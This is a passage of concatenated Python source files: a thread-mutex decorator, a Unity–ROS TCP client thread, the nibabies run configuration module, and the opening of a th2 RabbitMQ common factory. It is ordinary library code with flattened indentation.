be accessed by one thread at a time, you can use the ``mutex`` decorator
to enforce this restriction. As a contrived example::
class Example(object):
def __init__(self):
self.__sharedData = []
@mutex
def dangerousMethod1(self, message):
                self.__sharedData.append(message)
@mutex
def dangerousMethod2(self):
                return self.__sharedData.pop()
The ``@mutex`` decorator will ensure that, at any point in time, only
one thread is running either of the ``dangerousMethod1`` or
``dangerousMethod2`` methods.
    See the :class:`MutexFactory` class for details.
"""
return MutexFactory(*args, **kwargs)
class MutexFactory(object):
"""The ``MutexFactory`` is a placeholder for methods which have been
decorated with the :func:`mutex` decorator. When the method of a class
is decorated with ``@mutex``, a ``MutexFactory`` is created.
Later on, when the method is accessed on an instance, the :meth:`__get__`
method creates the true decorator function, and replaces the instance
method with that decorator.
.. note:: The ``MutexFactory`` adds an attribute called
              ``_idle_mutex_lock`` to all instances that have
``@mutex``-decorated methods.
"""
createLock = threading.Lock()
"""This lock is used by all ``MutexFactory`` instances when a decorated
instance method is accessed for the first time.
The first time that a mutexed method is accessed on an instance, a new
``threading.Lock`` is created, to be shared by all mutexed methods of that
instance. The ``createLock`` is used to ensure that this can only occur
once for each instance.
"""
def __init__(self, function):
"""Create a ``MutexFactory``.
"""
self.__func = function
def __get__(self, instance, cls):
"""When this ``MutexFactory`` is accessed through an instance,
a decorator function is created which enforces mutually exclusive
access to the decorated method. A single ``threading.Lock`` object
is shared between all ``@mutex``-decorated methods on a single
instance.
If this ``MutexFactory`` is accessed through a class, the
decorated function is returned.
"""
# Class-level access
if instance is None:
return self.__func
        # Get the lock object, creating it if necessary.
# We use the createLock in case multiple threads
# access a method at the same time, in which case
# only one of them will be able to create the
# instance lock.
with MutexFactory.createLock:
lock = getattr(instance, '_idle_mutex_lock', None)
if lock is None:
lock = threading.Lock()
instance._idle_mutex_lock = lock
# The true decorator function
def decorator(*args, **kwargs):
with instance._idle_mutex_lock:
return self.__func(instance, *args, **kwargs)
# Replace this MutexFactory with
# the decorator on the instance
decorator = functools.update_wrapper(decorator, self.__func)
setattr(instance, self.__func.__name__, decorator)
return decorator
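# Hedged usage sketch mirroring the mutex docstring above; the class and
# method names are illustrative only. Both methods share one per-instance
# lock, so only one thread at a time can be inside either of them.
class _MutexExample(object):
    def __init__(self):
        self.__sharedData = []
    @mutex
    def safeAppend(self, item):
        self.__sharedData.append(item)
    @mutex
    def safePop(self):
        return self.__sharedData.pop()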
|
client.py
|
# Copyright 2020 Unity Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import socket
import rospy
from io import BytesIO
import threading
import json
from .exceptions import TopicOrServiceNameDoesNotExistError
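# Illustrative sketch of the length-prefixed wire format that ClientThread
# below reads and writes: a 4-byte little-endian length followed by that many
# payload bytes, first for the destination string and then for the serialized
# message. The destination and payload arguments are supplied by the caller.
def _example_frame(destination, payload):
    dest_bytes = destination.encode("utf-8")
    dest_info = struct.pack("<I%ss" % len(dest_bytes), len(dest_bytes), dest_bytes)
    return dest_info + struct.pack("<I", len(payload)) + payload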
class ClientThread(threading.Thread):
"""
Thread class to read all data from a connection and pass along the data to the
desired source.
"""
def __init__(self, conn, tcp_server, incoming_ip, incoming_port):
"""
Set class variables
Args:
conn:
source_destination_dict: dictionary of destination name to RosCommunicator class
"""
self.conn = conn
self.tcp_server = tcp_server
self.incoming_ip = incoming_ip
self.incoming_port = incoming_port
threading.Thread.__init__(self)
@staticmethod
def recvall(conn, size, flags=0):
"""
Receive exactly ``size`` bytes from the socket.
"""
buffer = bytearray(size)
view = memoryview(buffer)
pos = 0
while pos < size:
read = conn.recv_into(view[pos:], size - pos, flags)
if not read:
raise IOError("No more data available")
pos += read
return bytes(buffer)
@staticmethod
def read_int32(conn):
"""
Reads four bytes from socket connection and unpacks them to an int
Returns: int
"""
raw_bytes = ClientThread.recvall(conn, 4)
num = struct.unpack("<I", raw_bytes)[0]
return num
@staticmethod
def read_string(conn):
"""
Reads int32 from socket connection to determine how many bytes to
read to get the string that follows. Read that number of bytes and
decode to utf-8 string.
Returns: string
"""
str_len = ClientThread.read_int32(conn)
str_bytes = ClientThread.recvall(conn, str_len)
decoded_str = str_bytes.decode("utf-8")
return decoded_str
@staticmethod
def read_message(conn):
"""
Decode destination and full message size from socket connection.
Grab bytes in chunks until full message has been read.
"""
data = b""
destination = ClientThread.read_string(conn)
full_message_size = ClientThread.read_int32(conn)
while len(data) < full_message_size:
# Only grabs max of 1024 bytes TODO: change to TCPServer's buffer_size
grab = 1024 if full_message_size - len(data) > 1024 else full_message_size - len(data)
packet = ClientThread.recvall(conn, grab)
if not packet:
rospy.logerr("No packets...")
break
data += packet
if full_message_size > 0 and not data:
rospy.logerr("No data for a message size of {}, breaking!".format(full_message_size))
return
return destination, data
@staticmethod
def serialize_message(destination, message):
"""
Serialize a destination and message class.
Args:
destination: name of destination
message: message class to serialize
Returns:
serialized destination and message as a list of bytes
"""
dest_bytes = destination.encode("utf-8")
length = len(dest_bytes)
dest_info = struct.pack("<I%ss" % length, length, dest_bytes)
serial_response = BytesIO()
message.serialize(serial_response)
# Per documention, https://docs.python.org/3.8/library/io.html#io.IOBase.seek,
# seek to end of stream for length
# SEEK_SET or 0 - start of the stream (the default); offset should be zero or positive
# SEEK_CUR or 1 - current stream position; offset may be negative
# SEEK_END or 2 - end of the stream; offset is usually negative
response_len = serial_response.seek(0, 2)
msg_length = struct.pack("<I", response_len)
serialized_message = dest_info + msg_length + serial_response.getvalue()
return serialized_message
@staticmethod
def serialize_command(command, params):
cmd_bytes = command.encode("utf-8")
cmd_length = len(cmd_bytes)
cmd_info = struct.pack("<I%ss" % cmd_length, cmd_length, cmd_bytes)
json_bytes = json.dumps(params.__dict__).encode("utf-8")
json_length = len(json_bytes)
json_info = struct.pack("<I%ss" % json_length, json_length, json_bytes)
return cmd_info + json_info
def send_ros_service_request(self, srv_id, destination, data):
if destination not in self.tcp_server.source_destination_dict.keys():
error_msg = "Service destination '{}' is not registered! Known topics are: {} ".format(
destination, self.tcp_server.source_destination_dict.keys()
)
self.tcp_server.send_unity_error(error_msg)
rospy.logerr(error_msg)
# TODO: send a response to Unity anyway?
return
else:
ros_communicator = self.tcp_server.source_destination_dict[destination]
service_thread = threading.Thread(
target=self.service_call_thread, args=(srv_id, destination, data, ros_communicator)
)
service_thread.daemon = True
service_thread.start()
def service_call_thread(self, srv_id, destination, data, ros_communicator):
response = ros_communicator.send(data)
if not response:
error_msg = "No response data from service '{}'!".format(destination)
self.tcp_server.send_unity_error(error_msg)
rospy.logerr(error_msg)
# TODO: send a response to Unity anyway?
return
self.tcp_server.unity_tcp_sender.send_ros_service_response(srv_id, destination, response)
def run(self):
"""
Read a message and determine where to send it based on the source_destination_dict
and destination string. Then send the read message.
If there is a response after sending the serialized data, assume it is a
ROS service response.
Message format is expected to arrive as
int: length of destination bytes
str: destination. Publisher topic, Subscriber topic, Service name, etc
int: size of full message
msg: the ROS msg type as bytes
"""
rospy.loginfo("Connection from {}".format(self.incoming_ip))
halt_event = threading.Event()
self.tcp_server.unity_tcp_sender.start_sender(self.conn, halt_event)
try:
while not halt_event.is_set():
destination, data = self.read_message(self.conn)
if self.tcp_server.pending_srv_id is not None:
# if we've been told that the next message will be a service request/response, process it as such
if self.tcp_server.pending_srv_is_request:
self.send_ros_service_request(
self.tcp_server.pending_srv_id, destination, data
)
else:
self.tcp_server.send_unity_service_response(
self.tcp_server.pending_srv_id, data
)
self.tcp_server.pending_srv_id = None
elif destination == "":
# ignore this keepalive message, listen for more
pass
elif destination.startswith("__"):
# handle a system command, such as registering new topics
self.tcp_server.handle_syscommand(destination, data)
elif destination in self.tcp_server.source_destination_dict:
ros_communicator = self.tcp_server.source_destination_dict[destination]
response = ros_communicator.send(data)
else:
error_msg = "Topic '{}' is not registered! Known topics are: {} ".format(
destination, self.tcp_server.source_destination_dict.keys()
)
self.tcp_server.send_unity_error(error_msg)
rospy.logerr(error_msg)
except IOError as e:
rospy.logerr("Exception: {}".format(e))
finally:
halt_event.set()
self.conn.close()
rospy.loginfo("Disconnected from {}".format(self.incoming_ip))
|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
r"""
A Python module to maintain unique, run-wide *nibabies* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<output_dir>/sub-<participant_id>/log/<run_unique_id>/nibabies.toml``.
Settings are stored using :abbr:`TOML (Tom's Obvious, Minimal Language)`.
The module has a :py:func:`~nibabies.config.to_filename` function to allow writing out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../nibabies/data/tests/config.toml
:language: toml
:name: nibabies.toml
:caption: **Example file representation of nibabies settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~nibabies.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from nibabies import config
config_file = config.execution.work_dir / '.nibabies.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` is responsible for other convenience actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Setting up a filter for warnings as early as possible.
* Automating I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
import sys
from multiprocessing import set_start_method
# Disable NiPype etelemetry always
_disable_et = bool(os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
CONFIG_FILENAME = "nibabies.toml"
try:
set_start_method("forkserver")
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom import for after initializing the forkserver and
# ignoring the most annoying warnings
import random
from uuid import uuid4
from time import strftime
from pathlib import Path
from nipype import __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any(
(
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("NIBABIES_DEV", "0").lower() in ("1", "on", "true", "y", "yes"),
)
):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("NIBABIES_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
# https://github.com/nipreps/fmriprep/pull/2080#discussion_r409118765
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
else:
import logging
logging.addLevelName(25, "IMPORTANT") # Add a new level between INFO and WARNING
logging.addLevelName(15, "VERBOSE") # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
# Ping NiPype eTelemetry once if env var was not set
# workers on the pool will have the env variable set from the master process
if not _disable_et:
# Just get so analytics track one hit
from contextlib import suppress
from requests import get as _get_url, ConnectionError, ReadTimeout
with suppress((ConnectionError, ReadTimeout)):
_get_url("https://rig.mit.edu/et/projects/nipy/nipype", timeout=0.05)
# Execution environment
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv("IS_DOCKER_8395080871"):
_exec_env = "singularity"
_cgroup = Path("/proc/1/cgroup")
if _cgroup.exists() and "docker" in _cgroup.read_text():
_docker_ver = os.getenv("DOCKER_VERSION_8395080871")
_exec_env = "nibabies-docker" if _docker_ver else "docker"
del _cgroup
_fs_license = os.getenv("FS_LICENSE")
if not _fs_license and os.getenv("FREESURFER_HOME"):
_fs_home = os.getenv("FREESURFER_HOME")
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(
os.getenv("TEMPLATEFLOW_HOME", os.path.join(os.getenv("HOME"), ".cache", "templateflow"))
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024 ** 3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = "n/a"
_oc_policy = "n/a"
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path("/proc/sys/vm/overcommit_memory")
if _proc_oc_path.exists():
_oc_policy = {"0": "heuristic", "1": "always", "2": "never"}.get(
_proc_oc_path.read_text().strip(), "unknown"
)
if _oc_policy != "never":
_proc_oc_kbytes = Path("/proc/sys/vm/overcommit_kbytes")
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if _oc_limit in ("0", "n/a") and Path("/proc/sys/vm/overcommit_ratio").exists():
_oc_limit = "{}%".format(Path("/proc/sys/vm/overcommit_ratio").read_text().strip())
except Exception:
pass
# Debug modes are names that influence the exposure of internal details to
# the user, either through additional derivatives or increased verbosity
DEBUG_MODES = ("compcor", "registration", "fieldmaps")
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError("Configuration type is not instantiable.")
@classmethod
def load(cls, settings, init=True, ignore=None):
"""Store settings from a dictionary."""
ignore = ignore or {}
for k, v in settings.items():
if k in ignore or v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
elif hasattr(cls, k):
setattr(cls, k, v)
if init and hasattr(cls, "init"):
cls.init()
@classmethod
def get(cls):
"""Return defined settings."""
from niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith("_") or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *nibabies* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*NiBabies*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = "txt"
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = "MultiProc"
"""NiPype's execution plugin."""
plugin_args = {
"maxtasksperchild": 1,
"raise_insufficient": False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
"plugin": cls.plugin,
"plugin_args": cls.plugin_args,
}
if cls.plugin in ("MultiProc", "LegacyMultiProc"):
out["plugin_args"]["n_procs"] = int(cls.nprocs)
if cls.memory_gb:
out["plugin_args"]["memory_gb"] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config(
{
"monitoring": {
"enabled": cls.resource_monitor,
"sample_frequency": "0.5",
"summary_append": True,
}
}
)
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config(
{
"execution": {
"crashdump_dir": str(execution.log_dir),
"crashfile_format": cls.crashfile_format,
"get_linked_libs": cls.get_linked_libs,
"stop_on_first_crash": cls.stop_on_first_crash,
"check_version": False, # disable future telemetry
}
}
)
if cls.omp_nthreads is None:
cls.omp_nthreads = min(cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8)
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_database_dir = None
"""Path to the directory containing SQLite database indices for the input BIDS dataset."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
sloppy = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
debug = []
"""Debug mode(s)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
nibabies_dir = None
"""Root of NiBabies BIDS Derivatives dataset. Depends on output_layout."""
notrack = False
"""Do not monitor *nibabies* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_layout = None
"""Layout of derivatives within output_dir."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = f"{strftime('%Y%m%d-%H%M%S')}_{uuid4()}"
"""Unique identifier of this particular run."""
segmentation_atlases_dir = None
"""Directory with atlases to use for JLF segmentations"""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path("work").absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
"anat_derivatives",
"bids_dir",
"bids_database_dir",
"fs_license_file",
"fs_subjects_dir",
"layout",
"log_dir",
"nibabies_dir",
"output_dir",
"segmentation_atlases_dir",
"templateflow_home",
"work_dir",
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout, BIDSLayoutIndexer
_db_path = cls.bids_database_dir or (cls.work_dir / cls.run_uuid / "bids_db")
_db_path.mkdir(exist_ok=True, parents=True)
# Recommended after PyBIDS 12.1
_indexer = BIDSLayoutIndexer(
validate=False,
ignore=(
"code",
"stimuli",
"sourcedata",
"models",
re.compile(r"^\."),
re.compile(
r"sub-[a-zA-Z0-9]+(/ses-[a-zA-Z0-9]+)?/(beh|dwi|eeg|ieeg|meg|perf)"
),
),
)
cls._layout = BIDSLayout(
str(cls.bids_dir),
database_path=_db_path,
reset_database=cls.bids_database_dir is None,
indexer=_indexer,
)
cls.bids_database_dir = _db_path
cls.layout = cls._layout
if cls.bids_filters:
from bids.layout import Query
# unserialize pybids Query enum values
for acq, filters in cls.bids_filters.items():
cls.bids_filters[acq] = {
k: getattr(Query, v[7:-4]) if not isinstance(v, Query) and "Query" in v else v
for k, v in filters.items()
}
if "all" in cls.debug:
cls.debug = list(DEBUG_MODES)
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
age_months = None
"""Age (in months)"""
anat_only = False
"""Execute the anatomical preprocessing only."""
aroma_err_on_warn = None
"""Cast AROMA warnings to errors."""
aroma_melodic_dim = None
"""Number of ICA components to be estimated by MELODIC
(positive = exact, negative = maximum)."""
bold2t1w_dof = None
"""Degrees of freedom of the BOLD-to-T1w registration steps."""
bold2t1w_init = "register"
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
BOLD image-header ('header')."""
cifti_output = None
"""Generate HCP Grayordinates, accepts either ``'91k'`` (default) or ``'170k'``."""
dummy_scans = None
"""Set a number of initial scans to be considered nonsteady states."""
fd_radius = 45
"""Head radius in mm for framewise displacement calculation"""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run FreeSurfer ``recon-all`` with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *nibabies*."""
longitudinal = False
"""Run FreeSurfer ``recon-all`` with the ``-logitudinal`` flag."""
medial_surface_nan = None
"""Fill medial surface with :abbr:`NaNs (not-a-number)` when sampling."""
regressors_all_comps = None
"""Return all CompCor components."""
regressors_dvars_th = None
"""Threshold for DVARS."""
regressors_fd_th = None
"""Threshold for :abbr:`FD (frame-wise displacement)`."""
run_reconall = True
"""Run FreeSurfer's surface reconstruction."""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "UNCInfant:cohort-1"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
*nibabies* will run brain extraction of the T1w)."""
slice_time_ref = 0.5
"""The time of the reference slice to correct BOLD values to, as a fraction
of acquisition time. 0 indicates the start, 0.5 the midpoint, and 1 the end
of acquisition. The alias `start` corresponds to 0, and `middle` to 0.5.
The default value is 0.5."""
spaces = None
"""Keeps the :py:class:`~niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_aroma = None
"""Run ICA-:abbr:`AROMA (automatic removal of motion artifacts)`."""
use_bbr = False
"""Run boundary-based registration for BOLD-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger("cli")
"""Command-line interface logging."""
workflow = logging.getLogger("nipype.workflow")
"""NiPype's workflow logger."""
interface = logging.getLogger("nipype.interface")
"""NiPype's interface logger."""
utils = logging.getLogger("nipype.utils")
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt))
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config(
{"logging": {"log_directory": str(execution.log_dir), "log_to_file": True}}
)
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
_random_seed = None
master = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
@classmethod
def init(cls):
if cls._random_seed is not None:
cls.master = cls._random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ["ANTS_RANDOM_SEED"] = str(val)
return val
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.load(settings)
loggers.init()
def load(filename, skip=None):
"""Load settings from file."""
from toml import loads
skip = skip or {}
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != "environment":
section = getattr(sys.modules[__name__], sectionname)
ignore = skip.get(sectionname)
section.load(configs, ignore=ignore)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
"environment": environment.get(),
"execution": execution.get(),
"workflow": workflow.get(),
"nipype": nipype.get(),
"seeds": seeds.get(),
}
if not flat:
return settings
return {
".".join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()
}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(" ") for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
if workflow.age_months is not None:
from .utils.misc import cohort_by_months
# cohort workaround
if any(
"MNIInfant" in space.split(":")[0]
for space in spaces.get_spaces(nonstandard=False, dim=(3,))
):
cohort = cohort_by_months("MNIInfant", workflow.age_months)
spaces.add(Reference("MNIInfant", {"cohort": cohort}))
# Ensure user-defined spatial references for outputs are correctly parsed.
# Certain options require normalization to a space not explicitly defined by users.
# These spaces will not be included in the final outputs.
if workflow.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
spaces.add(Reference("MNI152NLin6Asym", {"res": "2"}))
if workflow.cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = "2" if workflow.cifti_output == "91k" else "1"
spaces.add(Reference("fsaverage", {"den": "164k"}))
spaces.add(Reference("MNI152NLin6Asym", {"res": vol_res}))
# Make the SpatialReferences object available
workflow.spaces = spaces
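# --- Illustrative sketch (not part of this module): typical round trip ---
# With the package and its dependencies installed, settings roughly flow as
# flat dict -> config sections -> TOML file -> config sections again:
#
#   from nibabies import config
#   config.from_dict({"bids_dir": "/data/bids", "nprocs": 4})
#   config.to_filename("/tmp/nibabies.toml")       # dumps every section as TOML
#   config.load("/tmp/nibabies.toml")              # restores them (e.g. in a subprocess)
#   config.get(flat=True)["execution.bids_dir"]    # -> "/data/bids"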
|
abstract_common_factory.py
|
# Copyright 2020-2020 Exactpro (Exactpro Systems Limited)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import threading
from abc import ABC, abstractmethod
from threading import Lock
import pika
from th2_common.schema.cradle.cradle_configuration import CradleConfiguration
from th2_common.schema.event.event_batch_router import EventBatchRouter
from th2_common.schema.grpc.configuration.grpc_router_configuration import GrpcRouterConfiguration
from th2_common.schema.grpc.router.grpc_router import GrpcRouter
from th2_common.schema.grpc.router.impl.default_grpc_router import DefaultGrpcRouter
from th2_common.schema.message.configuration.message_router_configuration import MessageRouterConfiguration
from th2_common.schema.message.impl.rabbitmq.configuration.rabbitmq_configuration import RabbitMQConfiguration
from th2_common.schema.message.impl.rabbitmq.parsed.rabbit_parsed_batch_router import RabbitParsedBatchRouter
from th2_common.schema.message.impl.rabbitmq.raw.rabbit_raw_batch_router import RabbitRawBatchRouter
from th2_common.schema.message.message_router import MessageRouter
logger = logging.getLogger()
class AbstractCommonFactory(ABC):
def __init__(self,
message_parsed_batch_router_class=RabbitParsedBatchRouter,
message_raw_batch_router_class=RabbitRawBatchRouter,
event_batch_router_class=EventBatchRouter,
grpc_router_class=DefaultGrpcRouter) -> None:
self.rabbit_mq_configuration = self._create_rabbit_mq_configuration()
self.message_router_configuration = self._create_message_router_configuration()
self.grpc_router_configuration = self._create_grpc_router_configuration()
self.message_parsed_batch_router_class = message_parsed_batch_router_class
self.message_raw_batch_router_class = message_raw_batch_router_class
self.event_batch_router_class = event_batch_router_class
self.grpc_router_class = grpc_router_class
self._message_parsed_batch_router = None
self._message_raw_batch_router = None
self._event_batch_router = None
self._grpc_router = None
credentials = pika.PlainCredentials(self.rabbit_mq_configuration.username,
self.rabbit_mq_configuration.password)
connection_parameters = pika.ConnectionParameters(virtual_host=self.rabbit_mq_configuration.vhost,
host=self.rabbit_mq_configuration.host,
port=self.rabbit_mq_configuration.port,
credentials=credentials)
self.connection = pika.BlockingConnection(connection_parameters)
self._notifier = threading.Event()
def notify(notifier, timeout):
while not notifier.wait(timeout):
self.connection.process_data_events()
